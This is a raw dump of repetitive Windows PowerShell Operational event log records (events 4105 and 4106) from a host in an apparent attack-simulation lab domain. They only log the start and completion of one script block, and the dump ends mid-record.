Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472433
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472432
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472431
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472430
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472429
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472428
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472427
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472426
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472425
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472424
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472423
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472422
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472421
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472420
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472419
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472418
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472417
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472416
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472415
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472414
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472413
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472412
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472411
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472410
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472409
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472408
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472407
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472406
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472405
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472404
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472403
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472402
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472401
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472400
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472399
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472398
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472397
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472396
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472395
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472394
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472393
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472392
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472391
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472390
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472389
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472388
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472387
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472386
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472385
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472384
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472383
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472382
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472381
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472380
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472379
Keywords=None
